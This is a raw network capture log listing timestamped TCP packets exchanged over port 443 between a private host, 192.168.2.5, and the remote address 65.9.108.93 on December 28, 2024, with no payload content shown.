Dec 28, 2024 22:21:19.897522926 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.039860964 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.039887905 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.039993048 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.040021896 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.040066004 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.047121048 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.047137976 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.047223091 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.047245979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.047288895 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.055435896 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.055458069 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.055531025 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.055556059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.055599928 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.063945055 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.063971043 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.064040899 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.064049006 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.064090014 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.071178913 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.071197033 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.071276903 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.071291924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.071333885 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.079288960 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.080128908 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.080169916 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.080210924 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.080218077 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.080248117 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.080265045 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.087429047 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.087451935 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.087533951 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.087543011 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.087585926 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.095817089 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.095840931 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.095936060 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.095943928 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.095988989 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.241055012 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.241081953 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.241153955 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.241170883 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.241206884 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.241220951 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.249116898 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.249140978 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.249190092 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.249196053 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.249247074 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.256473064 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.256500006 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.256576061 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.256586075 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.256630898 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.264508009 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.264543056 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.264605045 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.264632940 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.264652967 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.264678001 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.272783995 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.272810936 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.272891998 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.272902966 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.272937059 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.272949934 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.280421019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.280441046 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.280533075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.280541897 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.280585051 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.288726091 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.288743019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.288809061 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.288815975 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.288853884 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.295911074 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.295928955 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.295994997 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.296030045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.296072960 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.442846060 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.442871094 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.442934036 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.442945957 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.442991972 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.451972008 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.451998949 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.452038050 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.452043056 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.452075958 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.452094078 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.459629059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.459656000 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.459701061 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.459707022 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.459743977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.459764957 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.465523005 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.465548992 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.465593100 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.465598106 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.465637922 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.465646029 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.473751068 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.473778963 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.473815918 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.473822117 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.473861933 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.473875999 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.481398106 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.481420040 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.481461048 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.481466055 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.481496096 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.481513977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.489671946 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.489695072 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.489743948 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.489751101 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.489779949 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.489795923 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.491849899 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.498162985 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.498182058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.498243093 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.498250008 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.498302937 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895431995 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895457029 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895524025 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895535946 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895576000 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895612001 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895648003 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895663977 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895708084 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895718098 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895730019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895768881 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895787001 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895797014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895818949 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895833015 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895840883 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895853043 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895879030 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895896912 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895901918 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895934105 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895941973 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895960093 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.895973921 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.895978928 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896017075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896025896 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896039963 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896048069 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896054029 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896076918 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896095037 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896107912 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896110058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896117926 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896147966 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896166086 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896167994 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896183014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896184921 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896194935 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896249056 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896251917 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896261930 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896287918 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896323919 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896323919 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896327019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896337986 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896353960 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896358967 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896375895 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896408081 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896414042 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896445990 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896477938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896488905 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896496058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896512032 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896528959 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896528959 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896541119 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896553993 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896562099 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896584988 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896590948 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896600008 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896620989 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896641016 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896648884 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.896677017 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.896694899 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.897284985 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.959944963 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.959975004 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.960156918 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.960156918 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:20.960184097 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:20.960227013 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.044008970 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.044032097 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.044107914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.044125080 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.044173956 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.049110889 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.049132109 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.049216032 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.049221992 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.049268007 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.054316998 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.054333925 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.054408073 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.054414988 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.054470062 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.060859919 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.060880899 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.060940027 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.060945988 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.060956001 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.060986996 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.066694021 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.066715956 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.066767931 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.066772938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.066798925 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.066812038 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.071434975 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.072972059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.072988987 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.073062897 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.073080063 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.073118925 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.078640938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.078663111 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.078731060 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.078754902 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.078793049 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.084100962 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.084119081 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.084193945 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.084213972 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.084254026 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.244215012 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.244240999 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.244314909 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.244335890 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.244380951 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.250149965 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.250166893 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.250252962 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.250252962 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.250260115 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.250298977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.255354881 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.255371094 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.255414009 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.255420923 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.255454063 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.255469084 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.261162043 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.261194944 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.261235952 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.261245966 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.261286974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.261301994 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.267040014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.267056942 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.267101049 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.267112017 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.267138004 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.267158985 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.272272110 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.272286892 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.272341013 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.272357941 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.272397041 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.278496981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.278515100 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.278556108 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.278569937 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.278597116 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.278609991 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.283664942 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.283682108 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.283735991 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.283749104 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.283797026 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.297688961 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.446079016 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.446101904 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.446208000 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.446228981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.446280003 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.451206923 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.451230049 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.451301098 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.451308012 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.451359034 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.457042933 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.457061052 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.457125902 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.457133055 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.457165003 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.457179070 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.462945938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.462965012 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.463026047 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.463032961 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.463078022 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.468157053 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.468173981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.468251944 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.468259096 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.468303919 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.474168062 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.474189043 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.474245071 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.474251032 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.474298954 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.474318981 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.479619026 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.479636908 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.479716063 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.479722023 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.479768038 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.485397100 CET	443	49849	65.9.108.93	192.168.2.5
